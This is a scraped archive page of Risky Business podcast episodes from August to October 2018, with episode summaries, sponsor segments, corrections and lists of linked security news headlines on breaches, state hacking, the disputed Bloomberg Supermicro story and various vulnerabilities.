Show notes U.S. Begins First Cyberoperation Against Russia Aimed at Protecting Elections - The New York Times Russian woman charged with attempted meddling in upcoming U.S. midterms Apple CEO Tim Cook Is Calling For Bloomberg To Retract Its Chinese Spy Chip Story Amazon exec joins Apple in calling for a retraction of Bloomberg’s explosive microchip spying report | Business Insider Coats: ODNI has seen 'no evidence' of supply chain hack detailed in Bloomberg story Super Micro trashes Bloomberg chip hack story in recent customer letter | ZDNet Equifax engineer who designed breach portal gets 8 months of house arrest for insider trading | ZDNet Twitter publishes dump of accounts tied to Russian, Iranian influence campaigns | Ars Technica A Twitter employee groomed by the Saudi government prompted 2015 state-sponsored hacking warning | TechCrunch FireEye links Russian research lab to Triton ICS malware attacks | ZDNet Kaspersky says it detected infections with DarkPulsar, alleged NSA malware | ZDNet Patrick ☠️SMBv1☠️ Gray on Twitter: "Risky Biz gets a shout out in senate estimates... 2018 is weird.… " Magecart group leverages zero-days in 20 Magento extensions | ZDNet WordPress team working on "wiping older versions from existence on the internet" | ZDNet loses $7.5Mil worth of cryptocurrency in mysterious cold wallet hack | ZDNet Hackers steal data of 75,000 users after FFE breach | ZDNet Lawfare editor on persistent DDoS attack: 'We wish they'd knock it off' Vendors confirm products affected by libssh bug as PoC code pops up on GitHub | ZDNet Advertisers can track users across the Internet via TLS Session Resumption | ZDNet Open source web hosting software compromised with DDoS malware | ZDNet Legal and Constitutional Affairs Legislation Committee_2018_10_22_6688.pdf;fileType=application/pdf I forgot to talk about this in the show... this week's sponsor guest recommends people interested in machine learning check out the papers and slide decks here: CylanceOPTICS | Products | Cylance

Risky Business #518 -- "Russian Cambridge Analytica" booted off Facebook after token hack

Oct 17, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

More info on the Facebook token hack Facebook boots “Russian Cambridge Analytica” off platform Chinese MSS officer extradited to USA after being lured to Belgium NotPetya linked to Sandworm crew Czech intelligence services kill Hezbollah APT Pentagon travel records pwnt No, Khashoggi’s Apple Watch didn’t record his death Apple takes aim at Australia’s AA Bill US voter records for sale in hack forums PHP 5 support ends soon, netpocalypse to commence shortly afterward The world’s most hilarious libssh bug PLUS MOAR

This week’s show is sponsored by Senrio.

Senrio is best known for doing IoT identification, classification, visualisation and anomaly detection, but they’ve now applied the same approach to general IT. Stephen will be along later in the show to talk about what they’ve been able to engineer here. I’ve actually been working with them on this (in a limited capacity) for a few months and it’s very interesting stuff.

So yeah he’s talking about a feature release, then he’ll be releasing some open source tooling that mine your network metadata and spot interactive shells in your environment, which is handy, and then he’s going to preview some free training he’s doing with some other very well respected security people in New York soon.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Facebook Says 14 Million People Got Their Location Data and Private Search History Stolen - Motherboard Facebook disables accounts for Russian firm claiming to sell scraped user data - CNET In a first, a Chinese spy is extradited to the U.S. after stealing technology secrets, Justice Dept. says - The Washington Post Researchers link tools used in NotPetya and Ukraine grid hacks Czech intelligence service shuts down Hezbollah hacking operation | ZDNet Breach of Pentagon travel records exposes defense personnel PII Why missing Saudi journalist’s Apple Watch is an interesting, but unlikely, lead | TechCrunch Apple rebukes Australia’s “dangerously ambiguous” anti-encryption bill | TechCrunch US voter records from 19 states sold on hacking forum | ZDNet Ransomware hits computer networks of North Carolina water utility Around 62 percent of all Internet sites will run an unsupported PHP version in 10 weeks | ZDNet A mysterious grey-hat is patching people's outdated MikroTik routers | ZDNet Sony working on a fix for bug that's crashing PlayStation 4 consoles | ZDNet Microsoft JET vulnerability still open to attacks, despite recent patch | ZDNet Proof-of-concept code published for Microsoft Edge remote code execution bug | ZDNet WhatsApp fixes bug that let hackers take over app when answering a video call | ZDNet Kanye's Password, a WhatsApp Bug, and More Security News This Week | WIRED The ‘Donald Daters’ Trump Dating App Exposed Its Users’ Data - Motherboard libssh 0.8.4 and 0.7.6 security and bugfix release – libssh Senrio Senrio Quick Product Demo on Vimeo

Risky Business #517 -- Bloomberg's dumpster fire lights up infosec

Oct 10, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Bloomberg’s shaky, disputed report on hardware back doors A look back on other false reports about imaginary incidents published by Bloomberg GRU operations doxed by GCHQ DOJ charges Russian intelligence officers APT crews targeting MSPs Google+ API exposure the final straw Enterprise TLS interception gear is woefully insecure

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes (9+)Turkish Pipeline Explosion Probably No Cyber ​​Attack - Digital - Sü The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg Codebook - October 10, 2018 - Axios Patrick Gray on Twitter: "Just got this from Bloomberg PR.… " Apple Bloomberg Congressional Letter Patrick Gray on Twitter: "Holy shit… " Report: Apple designing its own servers to avoid snooping | Ars Technica Apple deleted server supplier after finding infected firmware in servers [Updated] | Ars Technica New Evidence of Hacked Supermicro Hardware Found in U.S. Telecom - Bloomberg HHM22137A2 TDK | Mouser Australia Reckless campaign of cyber attacks by Russian military intelligence service exposed - NCSC Site Justice Department charges 7 Russian intelligence officers U.S. Charges Russian GRU Officers with International Hacking and Related Influence and Disinformation Operations | OPA | Department of Justice Gordon Corera on Twitter: "Breaking - Dutch intelligence (with help of British) disrupted a Russian GRU cyber operation targeting OPCW on April 13th. Four Russian intelligence officers escorted out of country." Advanced Persistent Threat Activity Exploiting Managed Service Providers | US-CERT Google shuts down Google+ after API bug exposed details for over 500,000 users | ZDNet Google Plus Will Be Shut Down After User Information Was Exposed - The New York Times Google forcibly enables G Suite alerts for government-backed attacks | ZDNet SandboxEscaper on Twitter: "Why did gmail just throw a notification that government attackers are trying to get into my account. Not even kidding -.-" Google sets new rules for third-party apps to access Gmail data | ZDNet It's 2018, and network middleware still can't handle TLS without breaking encryption | ZDNet CEO Pleads Guilty to Selling Encrypted Phones to Organized Crime - Motherboard Project Zero: 365 Days Later: Finding and Exploiting Safari Bugs using Publicly Available Tools Microsoft October 2018 Patch Tuesday fixes zero-day exploited by FruityArmor APT | ZDNet U.S. GAO - Weapon Systems Cybersecurity: DOD Just Beginning to Grapple with Scale of Vulnerabilities Senetas, a leading provider of encryption technology

Risky Business Feature: Named source in "The Big Hack" has doubts about the story

Oct 9, 2018


In this podcast hardware security expert Joe Fitzpatrick, a named source in Bloomberg’s “Big Hack” piece, explains why he felt uncomfortable reading the story when it was published.

He also provided Risky.Biz with emails he sent to Bloomberg, prior to the story’s publication, that said the hardware back-dooring the article described “didn’t make sense”.

Show notes The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg NSA Said to Have Used Heartbleed Bug, Exposing Consumers - Bloomberg Mysterious ’08 Turkey Pipeline Blast Opened New Cyberwar - Bloomberg

Risky Biz Soap Box: What's up with the ZDI these days?

Oct 8, 2018


The Soap Box podcast series is a wholly sponsored podcast series we do here at Risky.Biz – vendors pay to participate. This soap box edition is brought to you by Trend Micro.

And in this edition we’re speaking with Dustin Childs who works for the Zero Day Initiative. ZDI is the entity responsible for the pwn2own competition. But not just that – they’ve been buying bugs since before it was cool. Everything from enterprise software, to linux bugs.. whatever. You find it, they’ll buy it.

Trend Micro actually owns the ZDI, and there’s a story right there in how that came to pass… but you know what? Trend seems to really be behind the ZDI program.

As you’ll hear, the original idea behind ZDI when it was a TippingPoint thing was so they could write IDS signatures for vulnerabilities that ZDI unearthed. We know today that spinning up sigs for bugs you’re paying for isn’t really a winning strategy for picking up 0day attempts against your computers, so, the question becomes, what do you do with a program like ZDI when you’re Trend Micro?

As it turns out, you do two things with it – there’s the marketing side, but there’s also the constant stream of exploit submissions that come in handy when you’re making endpoint security software.

We’ll also be hearing from Eric Skinner in this podcast – he’s Trend’s VP of Solution Marketing at Trend. Trend is pushing a major release of its endpoint security software and he’s along to spruik that a bit, as well as chiming in on some of the ZDI stuff.

Show notes Zero Day Initiative | Home Endpoint Sensor | Endpoint Detection and Response (EDR) |Trend Micro

[CORRECTED] Risky Business feature: A podcast on Bloomberg's absolutely wild Supermicro story

Oct 5, 2018


In this podcast I interview Stephen Ridley about Bloomberg’s blockbuster – but so far uncorroborated – story about possible hardware supply chain subversion by the Chinese government.

I also lay out some facts I’ve learned since the story broke.

[CORRECTED] I’ve added a correction to this podcast because the only source I could turn up who would corroborate the Bloomberg piece has retracted their claims.

This is a source who has provided me with good information in the past, I’ve known them for about 15 years and they’re very well plugged in. They showed me photos they said were from a teardown of a supermicro motherboard. These photos showed an unlabelled integrated circuit the source said was likely a hardware back door.

Further, the source said there were other problems with the Supermicro gear, including vulnerable firmware and security functions that just didn’t work properly.

Now the source says the photos were from different equipment, not their teardown of the Supermicro gear, and that they did not find hardware back doors on the Supermicro equipment.

So basically that source’s credibility with me is pretty shot right now, and the best I can do is retract my repetition of the source’s claim that they had verified backdoors in the Supermicro equipment.

Show notes The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg

Risky Business #516 -- The Facebook breach, e2e VOIP court verdict, Uber's record fine and more

Oct 3, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Facebook breach impacts 50m accounts US courts deny authorities’ attempted FB messenger wiretap Uber fined $148m for nondisclosure of 2016 breach Fancy Bear-linked UEFI malware appears in wild UK Conservative party conference app leaks like sieve Twitter bans distribution of “hacked material” VPNFilter botnet gets more capabilities Duo arrested over $14m cryptocurrency SIM-swap heist MOAR

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes 50 million Facebook accounts breached by access-token-harvesting attack | Ars Technica Facebook says it detected security breach after traffic spike | ZDNet Facebook sued hours after announcing security breach | ZDNet Facebook finds ‘no evidence’ hackers accessed connected apps | TechCrunch Exclusive: In test case, U.S. fails to force Facebook to wiretap Messenger calls - sources | Reuters Uber to pay $148 million to states for 2016 data breach - CyberScoop First UEFI malware discovered in wild is laptop security software hijacked by Russians | Ars Technica Report: Zoho's domain regularly exploited to move keylogger data UK Conservative Party conference app leaks MPs' personal details | ZDNet Twitter bans distribution of hacked materials ahead of US midterm elections | ZDNet Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: VPNFilter III: More Tools for the Swiss Army Knife of Malware Gigantic 100,000-strong botnet used to hijack traffic meant for Brazilian banks | ZDNet 2 men arrested in Oklahoma, suspected in $14 million cryptocurrency theft, hacking of California company | Hackers Are Holding High Profile Instagram Accounts Hostage - Motherboard Feds Force Suspect To Unlock An Apple iPhone X With Their Face U.S. looks to restart talks on global cyber norms Canadian restaurant chain suffers country-wide outage after malware outbreak | ZDNet Port of San Diego suffers cyber-attack, second port in a week after Barcelona | ZDNet Some Apple laptops shipped with Intel chips in "manufacturing mode" | ZDNet Google to no longer allow Chrome extensions that use obfuscated code | ZDNet Phishing campaign targets developers of Chrome extensions | ZDNet US sentences to prison its first ATM jackpotter | ZDNet FBI solves mystery surrounding 15-year-old Fruitfly Mac malware | ZDNet Hackers Can Stealthily Avoid Traps Set to Defend Amazon's Cloud | WIRED Alphabet launches VirusTotal Enterprise | ZDNet Researchers find vulnerability in Apple's MDM DEP process | ZDNet HD Moore on Twitter: "Estimate how old a device is based on it's MAC address with mac-ages.csv: (a huge thanks to @jedimercer for…" Adobe Releases Security Updates for Acrobat that Fix 86 Vulnerabilities Security Update for Foxit PDF Reader Fixes 118 Vulnerabilities (PDF) Weaponizing the haters: The Last Jedi and the strategic politicization of pop culture through social media manipulation. Gigamon Insight | Gigamon

Risky Business #515 -- NSA staffer at centre of Kaspersky scandal jailed

Sep 26, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal Zoho has a very bad week Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation Twitter API leaks DMs Equifax fined by UK Yubikey 5 enables passwordless Windows logins Privacy International has an aneurism NSS Labs launches antitrust suit against security software makers MOAR

This week’s show is brought to you by Rapid7.

Jen Andre is this week’s sponsor guest. She was the founder of Komand, which was a security automation and orchestration company but is now a part of Rapid7 as of about mid way through last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet EDITORIAL-EAST-20180920122519 Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur Twitter API bug leaked private data to other accounts Equifax fined maximum penalty under 1998 UK data protection law The Series 5 YubiKey Will Help Kill the Password | WIRED Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International UK spooks fess up to snooping on Privacy International's private data GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules NSS Labs files antitrust suit against multiple cybersecurity vendors Hacking for ca$h | The Strategist Operator of 'VirusTotal for criminals' gets 14-year prison sentence Tencent engineer attending cybersecurity event fined for hotel WiFi hacking Snyk gets $22 million for platform that tracks security flaws in open source projects They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard Microsoft Rolls Out Confidential Computing for Azure Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation This Windows file may be secretly hoarding your passwords and emails | ZDNet Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch 0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative Over 80 Cisco Products Affected by FragmentSmack DoS Bug Cisco patches 'critical' credential bug in video surveillance software Security Orchestration and Automation with InsightConnect | Rapid7 Security Orchestration and Automation for Security Operations | Rapid7

Risky Biz Soap Box: Yubico launches Yubikey 5, ushers in passwordless Windows logins

Sep 24, 2018


Soap Box is the wholly sponsored podcast series we do where vendors pay to participate.

Our guest in this edition is Jerrod Chong, the SVP of product at Yubico, the makers of Yubikeys. We were originally going to publish this Soap Box with Yubico a few weeks ago, but we delayed it for a very good reason.

This podcast is going out at the same time as a press release from Yubico – they’re releasing the Yubikey 5, and it’s a very significant update.

Regular listeners would have heard me talk about seeing Yubico’s booth at Black Hat – it was like a mosh pit, and I think there are two reasons for that. Firstly, they were giving away keys, (haha) but secondly, they were demonstrating FIDO2 Windows logins over NFC.

With the launch of the Yubikey 5, Yubico has actually delivered passwordless logins for Windows networks. You can do tap only via NFC, tap and pin via NFC, or you can roll old school with USB.

So, Jerrod Chong joined me for this conversation. We talk about the Yubikey 5, and more broadly about the future of authentication and authentication devices.

Show notes Introducing the YubiKey 5 Series with New NFC and FIDO2 Passwordless Features | Yubico Yubico Lightning Project | Yubico

Risky Business feature: iOS exploits just got a lot more expensive

Sep 21, 2018


We’re going to be talking to two people in this podcast and the topic is, for the most part, the introduction of pointer authentication on the latest Apple iPhones. This is a development that flew under the radar of most of the infosec media and it’s significant because it is going to basically wipe out ROP exploits as we know them. There’s no such thing as a perfect mitigation, but Apple has leveraged some recent ARM features to really lock down their devices.

In addition to the pointer authentication suff they’ve also made some changes that will affect the ability of companies like Cellebrite to unlock phones. Again, this won’t kill unlocks completely, but in one release Apple really has made life a lot harder for people in the offence game.

This will eventually have some consequences for the crypto debate. These devices are just getting more and more secure through some really cool engineering.

So we’ll be talking to Chris Wade about this, he’s the brain behind Corellium, an iOS emulator. His clients include everyone from exploit developers to the publishers of very popular iOS applications. If you want to back-test an app change on 15 different versions of iOS Corellium is the way to do that… or if you want to, you know, test your latest 0day it’s good for that, too.

Then we’re going to hear from Dr. Silvio Cesare of Infosect here in Oz. He’s going to talk about whether we might see similar mitigations on intel and weigh in on Apple’s changes.

Show notes Apple iOS Security Guide

Risky Business #514 -- New NSO Group report released and another State Department email breach. Drink!

Sep 19, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Citizen Lab drops NSO Group report “Weaponised Stuxnet” claims are idiotic Another State Department email breach! Drink! Dutch foil planned attack against Swiss Novichok lab Mirai botnet authors working for FBI US telcos want to be consumer auth brokers US fails to extradite “Mr Bitcoin” Much, much more

This week’s show is brought to you by Remediant. They make a just-in-time access solution for privileged account management (PAM), and we’re doing something a little different in this week’s sponsor interview.

Paul Lanzi of Remediant will be along, but so will Harry Perper of MITRE corporation. Harry’s pay-cheques say MITRE, but he’s been working on a NIST project. The National Cybersecurity Center of Excellence (NCCoE) at NIST has been working on a project to provide guidance on the secure usage and management of privileged accounts. The so-called 1800-18 document is a practical guide and reference architecture for privileged account management and we’ll talk to both Harry and Paul about that after the news.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Cyber Sleuths Find Traces of Infamous iPhone and Android Spyware ‘Pegasus’ in 45 Countries - Motherboard HIDE AND SEEK: Tracking NSO Group’s Pegasus Spyware to Operations in 45 Countries - The Citizen Lab iOS Security Guide iOS 12 September 2018 US military given more authority to launch preventative cyberattacks - CNNPolitics People Are Recklessly Speculating That the Massachusetts Gas Explosions Were a Stuxnet-Related Hack - Motherboard State Department email breach exposed employees' personal information - POLITICO Novichok poisoning: Russians expelled from Switzerland The Mirai Botnet Architects Are Now Fighting Crime With the FBI | WIRED U.S. Mobile Giants Want to be Your Online Identity — Krebs on Security Senior Google Scientist Resigns Over “Forfeiture of Our Values” in China Google Plans to Launch Censored Search Engine in China, Leaked Documents Reveal Google's prototype Chinese search engine links searches to phone numbers | Technology | The Guardian Vijay Boyapati on Twitter: "When I worked at Google, as an engineer on Google News, I was asked to write code to censor news articles in China (circa 2006). I refused and they took me off the project and put someone else on it. Doesn't surprise me Google is back at it. "Don't be Evil" is a Google myth.…" US loses extradition battle with Russia for Bitcoin kingpin | ZDNet US lawmakers introduce bill to fight cybersecurity workforce shortage | ZDNet Ransomware attack blacks out screens at Bristol Airport | ZDNet Security flaw can leak Intel ME encryption keys | ZDNet Nasty piece of CSS code crashes and restarts iPhones | ZDNet New cold boot attack affects 'nearly all modern computers' | ZDNet Uproar after Adobe winds down Magento rewards-based bug bounty program | ZDNet Jason Woosley on Twitter: "The demise of #BugBounty at @Magento has been greatly exaggerated. Yesterday we announced the transition of this program to the @Adobe @HackerOne system. We failed to mention that we will continue to pay out for this incredibly valuable work. Hack on!" Proofpoint: One month out from deadline, half of agency domains are DMARC compliant Cloudflare’s new ‘one-click’ DNSSEC setup will make it far more difficult to spoof websites | TechCrunch Facebook pilots new political campaign security tools — just 50 days before Election Day | TechCrunch Facebook Broadens Its Bug Bounty to Include Third-Party Apps | WIRED Google remotely changed the settings on a bunch of phones running Android 9 Pie - The Verge Zero day in popular video surveillance technology goes public, unpatched Privileged Account Management | NCCoE fs-pam-project-description-draft.pdf

Risky Business #513 -- The DPRK indictment, BA gets owned, Webauthn issues and more [CORRECTED]

Sep 12, 2018



This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

The DPRK indictment and subsequent fall out British Airways gets owned Webauthn hits some roadblocks The latest action from Washington DC Trend Micro has a bad time Tesla pays out for key-fob clone attack Tor browser 0day hits Twitter Much, much more

We’ve got a great sponsor interview for you this week – we’ll be joined by Haroon Meer of Thinkst Canary. They did something unusual over the last couple of weeks – they removed a feature in their Canary product. We’ll be talking about that, and also about the tendency for security software to be too complicated and configurable.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.


The original release of this podcast included discussion of some rumours that turned out to amount to nothing. We had mentioned three data points:

The CISO of American Airlines, Dan Glass, departing a few weeks ago Someone I know had their AA/Citi credit card re-issued, despite saying they only ever used that card to buy AA fares A rumour an FBI computer crime investigator is on site at American Airlines

Well, it turns out Dan Glass is a listener, and he got in touch with us after the podcast ran to clear this up. He says the reason he left is actually because AA was offering some very attractive redundancy packages. Following AA’s merger with US Airways the combined group eventually found itself in the position of having too many executives. As many listeners will know, being a CISO is a pretty hardcore job so Dan jumped at the chance to bounce out and have some time off.

As for the FBI being on-site, Dan says that’s not unusual. They’re one of the largest airlines in the world so they’re frequently liaising with LE. As for my pal’s card getting re-issued… who knows?

The point is it looks like these rumours and data points don’t actually add up to much. This is why I rarely run rumour in the podcast and at least try to do some verification. In this case I just didn’t have time, but still, I just should have just held it over until I’d had a chance to make some basic enquiries. It was sloppy. Sorry.

In particular I’d like to apologise to the fraud teams who may have been asked to follow this up, the PR teams who’ve no doubt been fielding questions about this and also to Dan Glass. Although, it must be said Dan and I had a very nice chat and he didn’t seem upset. Thanks for being a chiller, Dan!

Again, I’m sorry. I’ll do better in the future.


Show notes U.S. charges North Korean hacker over Sony, WannaCry incidents US indicts North Korean agent for WannaCry, Sony attacks [Updated] | Ars Technica Analysts expect Lazarus Group to evolve, clean up opsec Don't Punish A North Korean Hacker Just For Following Orders The North Korean Hacker Charges: Line-Drawing as a Necessary but not Sufficient Part of Deterrence - Lawfare British Airways breach caused by the same group that hit Ticketmaster | ZDNet Card-Skimming Malware Campaign Hits Dozens of Sites Daily Worries arise about security of new WebAuthn protocol | ZDNet A call for principle-based international agreements to govern law enforcement access to data - Microsoft on the Issues Exclusive: Trump to target foreign meddling in U.S. elections with sanctions order - sources | Reuters House passes deterrence bill that would call out nation-state hackers First IoT security bill reaches governor's desk in California | ZDNet DHS supply chain and CDM bills pass the House Former Facebook security chief Alex Stamos: Being a CSO can be a ‘crappy job’ | TechCrunch Alex Stamos: Pretty clear GRU's goal was to weaken a future Clinton presidency | ZDNet 'We simply haven't done enough': Facebook and Twitter execs testify on foreign influence campaigns Trend Micro blames data collection issue on code library re-use Apple Removes Top Security App For Stealing Data and Sending it to China Tesla offers 'goodwill' to security researchers hacking its cars Hackers Can Steal a Tesla Model S in Seconds by Cloning Its Key Fob | WIRED U.S. extradites Russian accused in hack of JPMorgan Chase Standard to protect against BGP hijack attacks gets first official draft | ZDNet Exploit Affecting Tor Browser Burned In A Tweet Exploit vendor drops Tor Browser zero-day on Twitter | ZDNet Tor launches official anonymous Android browser US government releases post-mortem report on Equifax hack | ZDNet GAO-18-559, DATA PROTECTION: Actions Taken by Equifax and Federal Agencies in Response to the 2017 Breach Thinkst Canary on Twitter: "This week we totally announced an un-feature. We are removing SNMP as an available service on Canaries. (Turns out its signal to noise ratio is terribad, and everyone we’ve ever caught through SNMP also tripped over other services too)…"

Snake Oilers 7 part 2: launch, InQuest and Aiculus

Sep 6, 2018


On this edition of Snake Oilers we hear from three companies, and for one of them, it’s actually their product launch!

Assetnote is a cloud asset discovery and security scanning platform spun out of the bug bounty community. If you’re a CSO with any large public attack surface you’ll really want to hear about that one. This platform finds things you didn’t even know your company had online in cloud environments and then scans them for real, actual RCEs. The user interface is awesome, too.

Then we’re going to hear from Pedram Amini of InQuest – they make a box that reassembles files from network packets captured off the wire or funnelled in through ICAP and then rips them to bits looking for badness. They call it deep file inspection and it’s a great way to supplement client side detection, at scale. You can even pass these reassembled files on to multi-AV or cloud services and use this platform to do spot threat hunting. It’s very powerful stuff, and honestly that’s an interview that got me thinking in a new way about detection concepts.

And then finally we’re joined by Omaru Maruatona of Aiculus. Omaru has a PHD in applying machine learning to bank fraud that he obtained while working for one of the big four banks here in Australia. After that he moved on the PwC as a penetration tester and now he’s running Aiculus. Aiculus has developed an API proxy that uses machine learning to detect funky calls. If you’re not satisfied that your API gateway has you completely covered then yeah, you’ll want to listen to that one.

Show notes Assetnote - Continuous Security Across Your External Attack Surface InQuest - Prevent attacks. Detect breaches. Hunt for threats. Aiculus

Risky Business #512 -- Five Eyes nations send clear message on encryption

Sep 5, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Five Eyes nations send a clear message on encryption Massive Azure outage FBI releases political campaign security guidance Google wants to kill the URL plugin owned sideways Final “Celebgate” hacker sentenced Google launches font fuzzing tool Chinese-made Google/Feitian U2F keys under scrutiny Some interesting TPM research MUCH MORE

This week’s podcast is brought to you by AttackIQ.

AttackIQ founder Stephan Chenette will be along in this week’s sponsor interview to talk to us about a few things – the MITRE attack matrix being one. He’ll also share with us his view that EDR is the most commonly misconfigured security technology he sees out there, and he has pretty good visibilty into things like that because AttackIQ, of course, makes attack simulation software designed to measure the efficacy of these types of solutions.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Five Eyes’ data access warning - Patrick Gray on Twitter: "Five Eyes officially warns the tech world: build interception capabilities voluntarily or we’ll legislate.…" Statement of Principles on Access to Evidence and Encryption Azure status FBI to political campaigns: Up your 'cyber hygiene' - ABC News Protected Voices — FBI Google Wants to Kill the URL | WIRED Chrome extension caught stealing passwords, cryptocurrency private keys | ZDNet Germany launches new cybersecurity research agency modeled after DARPA Fourth man receives prison sentence in 'Celebgate' photo leak Google open-sources internal tool for finding font-related security bugs | ZDNet Experts Call for Transparency Around Google’s Chinese-Made Security Keys - Motherboard Google Notifies People Targeted by Secret FBI Investigation - Motherboard Public IP Addresses of Tor Sites Exposed via SSL Certificates Temporary Patch Available for Recent Windows Task Scheduler ALPC Zero-Day Researchers Detail Two New Attacks on TPM Chips New Hakai IoT botnet takes aim at D-Link, Huawei, and Realtek routers | ZDNet Two Birds, One STONE PANDA Xipiter/Senrio exploitation training MITRE ATT&CK Module

Risky Business feature interview: Linux malware is booming, thanks to IoT

Aug 31, 2018


The widespread adoption of smart and IoT devices – everything from drones and security cameras to thermostats and routers, mean the developers of non-Windows-based malware have been pretty busy lately

In fact, there’s been an almost tenfold increase in the volume of these (ELF) samples submitted to Virus Total over the past two years. That’s according to a cohort of researchers from the Software and System Security group at French graduate school EURECOM, who set out in 2016 to develop an empirical study of non-Windows malware.

They downloaded hundreds of daily candidate samples from Virus Total for a year, resulting in a dataset of more than 10,000 binaries and a tool called Padawan, an automated framework for dynamic analysis of non-Windows malware.

The researchers presented findings earlier this year at the IEEE Symposium on Security and Privacy, and more recently at reverse engineering conference RECon in Montreal. Risky Business contributor Hilary Louise recently caught up over the phone with France-based EURECOM doctoral student Emanuele Cozzi who says the land of Linux-type malware analysis is a bit of a nascent field.

Show notes oakland18_cozzi.pdf Padawan live

Risky Business #511 -- Australia, Japan to ban Huawei, Struts drama, DNC lols and more

Aug 29, 2018


We’re going to stick with the revised format this week – we’re going long on news with Adam, then diving right in to the sponsor interview with Zane Lackey of Signal Sciences.

A bunch of you heard my long form, Soap Box interview with Zane from a few weeks back. We’re extending that interview out a bit in this week’s interview. Zane will be outlining what he thinks needs to change in DevSecOps tooling and workflow for things to really work nicely – it’s just a solid 12 minutes of good thinking and advice, that interview, so do stick around for it.

Adam Boileau will join the show to recap the week’s news:

Australia and Japan to ban Huawei from their 5G builds Struts bug: Big deal or meh? Voting machine maker ES&S rebuked by researchers AND US gov The DNC phish that wasn’t Recapping Andy Greenberg’s Maersk/Notpetya coverage Instagram adds real 2FA Windows privesc 0day on teh twittarz T-Mobile pwned harder than it initially admitted Log in to Windows with Google accounts Some hilarious Lazarus group shenanigans Much, much more

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes China intensifies criticism of Australia's Huawei 5G ban | Japan plans to block Huawei, ZTE from public procurement: report New critical vulnerability exposes Apache Struts instances to remote attacks Active Attacks Detected Using Apache Struts Vulnerability CVE-2018-11776 Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776 - Palo Alto Networks Blog The Cybersecurity 202: Lawmakers dismiss voting machine maker's claim that spies benefit from election hacking demos - The Washington Post Rob Joyce on Twitter: "Ignorance of insecurity does not get you security. We need to examine voting machines, SCADA systems, IOT and other important items in our lives. The investigation of these devices by the hacker community is a service, not a threat." How the U.S. Has Failed to Protect the 2018 Election—and Four Ways to Protect 2020 - Lawfare Democrats find hackers targeting voter database DNC says phishing incident was a false alarm Facebook bans Myanmar general as U.N. calls for independent investigation into Rohingya crisis Russian trolls targeted Australian voters on Twitter via #auspol and #MH17 Google removes dozens of YouTube channels linked to 'influence operation' The Untold Story of NotPetya, the Most Devastating Cyberattack in History | WIRED Scammers Threaten to Review Bomb a Travel Company Unless it Pays Ransom - Motherboard Instagram Expands 2FA Support Following Recent Wave of Account Hacks Exploit Published for Unpatched Flaw in Windows Task Scheduler SandboxEscaper on Twitter: "Here is the alpc bug as 0day: I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit." Travel blog of an evil transgirl Travel blog of an evil transgirl: Disclosures Hackers Stole Personal Data of 2 Million T-Mobile Customers - Motherboard You May Soon Be Able to Log Into Windows 10 Using a Google Account How a hacker network turned stolen press releases into $100 million - The Verge Cobalt Dickens threat group looks to be similar to indicted hackers Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware - Securelist Eset-Turla-Outlook-Backdoor.pdf Researchers find way to spy on remote screens—through the webcam mic | Ars Technica Windows 95 Is Now Available as an App for Windows, macOS and Linux The adventures of lab ED011—“Nobody would be able to duplicate what happened there” | Ars Technica Training Building a Modern Security Program [Book] The Next-Gen Web Protection Platform - WAF And RASP | Signal Sciences

Snake Oilers 7 part 1: Rapid7 on changes to InsightVM, ITProTV on online training

Aug 27, 2018


We’ve got two vendors pitching their wares in this edition of Snake Oilers. First up we’re talking to Rapid7 about its vulnerability scanning and management software. They’ve made some changes and they’ve got a couple more coming. This is bread and butter infosec stuff.

Then we’re going to hear from the team at ITProTV. They’re a video-based online training site, pitching themselves as like a Netflix but for online training. Instead of instructor-led training, they try to make stuff less dry – half hour training videos with two instructors on all sorts of topics.

The online training video sector is just booming right now, and ITProTV’s co-founder and “edutainer” Don Pezet will be along to walk through all of that.

Both of these companies are tracking enquiries originating from the podcast, so please do use the URLs in the show notes below if you’re interested in learning more.

